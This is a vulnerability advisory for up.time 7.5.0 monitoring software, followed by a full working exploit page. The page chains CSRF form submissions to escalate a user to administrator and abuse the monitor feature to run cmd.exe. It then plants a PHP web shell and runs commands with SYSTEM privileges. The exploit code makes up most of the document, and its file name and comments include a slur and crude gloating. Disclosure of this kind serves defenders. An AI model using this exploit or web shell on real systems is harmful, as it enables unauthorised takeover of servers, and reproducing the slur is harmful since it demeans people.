243 lines
No EOL
12 KiB
Text
243 lines
No EOL
12 KiB
Text
|
|
up.time 7.5.0 Upload And Execute File Exploit
|
|
|
|
|
|
Vendor: Idera Inc.
|
|
Product web page: http://www.uptimesoftware.com
|
|
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
|
|
|
|
Summary: The next-generation of IT monitoring software.
|
|
|
|
Desc: up.time suffers from arbitrary command execution.
|
|
Attackers can exploit this issue using the monitor service
|
|
feature and adding a command with respected arguments to given
|
|
binary for execution. In combination with the CSRF, Privilege
|
|
Escalation, Arbitrary text file creation and renaming that
|
|
file to php for example in arbitrary location and executing
|
|
system commands with SYSTEM privileges.
|
|
|
|
Tested on: Jetty, PHP/5.4.34, MySQL
|
|
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
|
|
|
|
|
|
Vulnerability discovered by Ewerson 'Crash' Guimaraes
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2015-5254
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php
|
|
|
|
|
|
29.07.2015
|
|
|
|
--
|
|
|
|
|
|
<html>
|
|
<head>
|
|
<title>Uptime Exploit</title>
|
|
</head>
|
|
|
|
<body onload="runme();">
|
|
|
|
|
|
<!-- Login -->
|
|
<form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0">
|
|
<input type="hidden" name="username" value="sample" />
|
|
<input type="hidden" name="password" value="123456" />
|
|
</form>
|
|
|
|
<!-- Escalate privileges -->
|
|
<form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1">
|
|
<input type="hidden" name="operation" value="submit" />
|
|
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
|
|
<input type="hidden" name="username" value="sample" />
|
|
<input type="hidden" name="password" value="123456" />
|
|
<input type="hidden" name="passwordConfirm" value="123456" />
|
|
<input type="hidden" name="firstname" value="Sample" />
|
|
<input type="hidden" name="lastname" value="User" />
|
|
<input type="hidden" name="location" value="" />
|
|
<input type="hidden" name="emailaddress" value="" />
|
|
<input type="hidden" name="emailtimeperiodid" value="1" />
|
|
<input type="hidden" name="phonenumber" value="" />
|
|
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
|
|
<input type="hidden" name="windowshost" value="" />
|
|
<input type="hidden" name="windowsworkgroup" value="" />
|
|
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
|
|
<input type="hidden" name="landingpage" value="MyPortal" />
|
|
<input type="hidden" name="isonvacation" value="0" />
|
|
<input type="hidden" name="receivealerts" value="0" />
|
|
<input type="hidden" name="activexgraphs" value="0" />
|
|
<input type="hidden" name="newuser" value="on" />
|
|
<input type="hidden" name="newuser" value="1" />
|
|
<input type="hidden" name="userroleid" value="1" />
|
|
<input type="hidden" name="usergroupid[]" value="1" />
|
|
</form>
|
|
|
|
<!-- Log-off to refresh permission -->
|
|
<form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2">
|
|
<input type="hidden" name="logout" value="1" />
|
|
</form>
|
|
|
|
<!-- Login with escalated user -->
|
|
<form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3">
|
|
<input type="hidden" name="username" value="sample" />
|
|
<input type="hidden" name="password" value="123456" />
|
|
</form>
|
|
|
|
<!-- Creating Monitor to rename php shell -->
|
|
<form name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4">
|
|
<input type="hidden" name="initialERDCId" value="20" />
|
|
<input type="hidden" name="target" value="1" />
|
|
<input type="hidden" name="targetType" value="systemList" />
|
|
<input type="hidden" name="systemList" value="1" />
|
|
<input type="hidden" name="serviceGroupList" value="-10" />
|
|
<input type="hidden" name="initialMode" value="standard" />
|
|
<input type="hidden" name="erdcName" value="Exploit" />
|
|
<input type="hidden" name="erdcInitialName" value="" />
|
|
<input type="hidden" name="erdcDescription" value="Exploit" />
|
|
<input type="hidden" name="hostButton" value="system" />
|
|
<input type="hidden" name="erdc_id" value="20" />
|
|
<input type="hidden" name="forceReload" value="0" />
|
|
<input type="hidden" name="operation" value="standard" />
|
|
<input type="hidden" name="erdc_instance_id" value="" />
|
|
<input type="hidden" name="label_[184]" value="Script Name" />
|
|
<input type="hidden" name="value_[184]" value="c:\windows\system32\cmd.exe" />
|
|
<input type="hidden" name="id_[184]" value="process" />
|
|
<input type="hidden" name="name_[process]" value="184" />
|
|
<input type="hidden" name="units_[184]" value="" />
|
|
<input type="hidden" name="guiBasic_[184]" value="1" />
|
|
<input type="hidden" name="inputType_[184]" value="GUIString" />
|
|
<input type="hidden" name="screenOrder_[184]" value="1" />
|
|
<input type="hidden" name="parmType_[184]" value="1" />
|
|
<input type="hidden" name="label_[185]" value="Arguments" />
|
|
<input type="hidden" name="value_[185]" value=" /C ren "C:\Program Files\uptime software\uptime\GUI\wizards\nigga.txt" "nigga.php" " />
|
|
<input type="hidden" name="id_[185]" value="args" />
|
|
<input type="hidden" name="name_[args]" value="185" />
|
|
<input type="hidden" name="units_[185]" value="" />
|
|
<input type="hidden" name="guiBasic_[185]" value="1" />
|
|
<input type="hidden" name="inputType_[185]" value="GUIString" />
|
|
<input type="hidden" name="screenOrder_[185]" value="2" />
|
|
<input type="hidden" name="parmType_[185]" value="1" />
|
|
<input type="hidden" name="label_[187]" value="Output" />
|
|
<input type="hidden" name="can_retain_[187]" value="false" />
|
|
<input type="hidden" name="comparisonWarn_[187]" value="-1" />
|
|
<input type="hidden" name="comparison_[187]" value="-1" />
|
|
<input type="hidden" name="id_[187]" value="value_critical_output" />
|
|
<input type="hidden" name="name_[output]" value="187" />
|
|
<input type="hidden" name="units_[187]" value="" />
|
|
<input type="hidden" name="guiBasic_[187]" value="1" />
|
|
<input type="hidden" name="inputType_[187]" value="GUIString" />
|
|
<input type="hidden" name="screenOrder_[187]" value="4" />
|
|
<input type="hidden" name="parmType_[187]" value="2" />
|
|
<input type="hidden" name="label_[189]" value="Response time" />
|
|
<input type="hidden" name="can_retain_[189]" value="false" />
|
|
<input type="hidden" name="comparisonWarn_[189]" value="-1" />
|
|
<input type="hidden" name="comparison_[189]" value="-1" />
|
|
<input type="hidden" name="id_[189]" value="value_critical_timer" />
|
|
<input type="hidden" name="name_[timer]" value="189" />
|
|
<input type="hidden" name="units_[189]" value="ms" />
|
|
<input type="hidden" name="guiBasic_[189]" value="0" />
|
|
<input type="hidden" name="inputType_[189]" value="GUIInteger" />
|
|
<input type="hidden" name="screenOrder_[189]" value="6" />
|
|
<input type="hidden" name="parmType_[189]" value="2" />
|
|
<input type="hidden" name="timing_[erdc_instance_monitored]" value="1" />
|
|
<input type="hidden" name="timing_[timeout]" value="60" />
|
|
<input type="hidden" name="timing_[check_interval]" value="10" />
|
|
<input type="hidden" name="timing_[recheck_interval]" value="1" />
|
|
<input type="hidden" name="timing_[max_rechecks]" value="3" />
|
|
<input type="hidden" name="alerting_[notification]" value="1" />
|
|
<input type="hidden" name="alerting_[alert_interval]" value="120" />
|
|
<input type="hidden" name="alerting_[alert_on_critical]" value="1" />
|
|
<input type="hidden" name="alerting_[alert_on_warning]" value="1" />
|
|
<input type="hidden" name="alerting_[alert_on_recovery]" value="1" />
|
|
<input type="hidden" name="alerting_[alert_on_unknown]" value="1" />
|
|
<input type="hidden" name="time_period_id" value="1" />
|
|
<input type="hidden" name="pageFinish" value="Finish" />
|
|
<input type="hidden" name="pageContinue" value="Continue..." />
|
|
<input type="hidden" name="isWizard" value="1" />
|
|
<input type="hidden" name="wizardPage" value="2" />
|
|
<input type="hidden" name="wizardNumPages" value="2" />
|
|
<input type="hidden" name="wizardTask" value="pageFinish" />
|
|
<input type="hidden" name="visitedPage[1]" value="1" />
|
|
<input type="hidden" name="visitedPage[2]" value="1" />
|
|
</form>
|
|
|
|
|
|
<!-- Uploading php shell txt format -->
|
|
<form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5">
|
|
<input type="hidden" name="file_name" value="nigga.txt" />
|
|
<input type="hidden" name="script" value="<? passthru($_GET['cmd']); ?>" />
|
|
</form>
|
|
|
|
|
|
<!-- Run command to rename php shell -->
|
|
<form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6">
|
|
<input type="hidden" name="section" value="RunERDCInstance" />
|
|
<input type="hidden" name="subsection" value="view" />
|
|
<input type="hidden" name="id" value="65535" />
|
|
<input type="hidden" name="name" value="Exploit" />
|
|
</form>
|
|
|
|
|
|
<!-- Executing basic command -->
|
|
<form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7">
|
|
<input type="hidden" name="cmd" value="whoami" />
|
|
</form>
|
|
|
|
|
|
<iframe name="frame0"></iframe>
|
|
<iframe name="frame1"></iframe>
|
|
<iframe name="frame2"></iframe>
|
|
<iframe name="frame3"></iframe>
|
|
<iframe name="frame4"></iframe>
|
|
<iframe name="frame5"></iframe>
|
|
<iframe name="frame6"></iframe>
|
|
<iframe name="frame7"></iframe>
|
|
|
|
<script>
|
|
function runme()
|
|
{
|
|
document.login.submit();
|
|
document.getElementsByTagName("iframe")[0].onload = function()
|
|
//document.write("Login....")
|
|
{
|
|
document.privadm.submit();
|
|
document.getElementsByTagName("iframe")[1].onload = function()
|
|
//document.write("Mutating to admin uahsuasuas");
|
|
{
|
|
document.logoff.submit();
|
|
document.getElementsByTagName("iframe")[2].onload = function()
|
|
//document.write("Refreshing perms...");
|
|
{
|
|
document.login2.submit();
|
|
document.getElementsByTagName("iframe")[3].onload = function()
|
|
//document.write("Login again...Keep Calm....");
|
|
{
|
|
document.createmonitor.submit();
|
|
document.getElementsByTagName("iframe")[4].onload = function()
|
|
//document.write("Creating F*cking monitor");
|
|
{
|
|
document.uploadshell.submit();
|
|
document.getElementsByTagName("iframe")[5].onload = function()
|
|
//document.write("Uploading webshell. Muaaaaa! Muaaaaa!!");
|
|
{
|
|
document.run.submit();
|
|
document.getElementsByTagName("iframe")[6].onload = function()
|
|
//document.write("Trick to shell... come on....");
|
|
{
|
|
document.exploit.submit();
|
|
document.getElementsByTagName("iframe")[7].onload = function()
|
|
alert('Pwned!!!!!!!!!!!!!!!!!!!!!!')
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
</script>
|
|
|
|
</body>
|
|
</html> |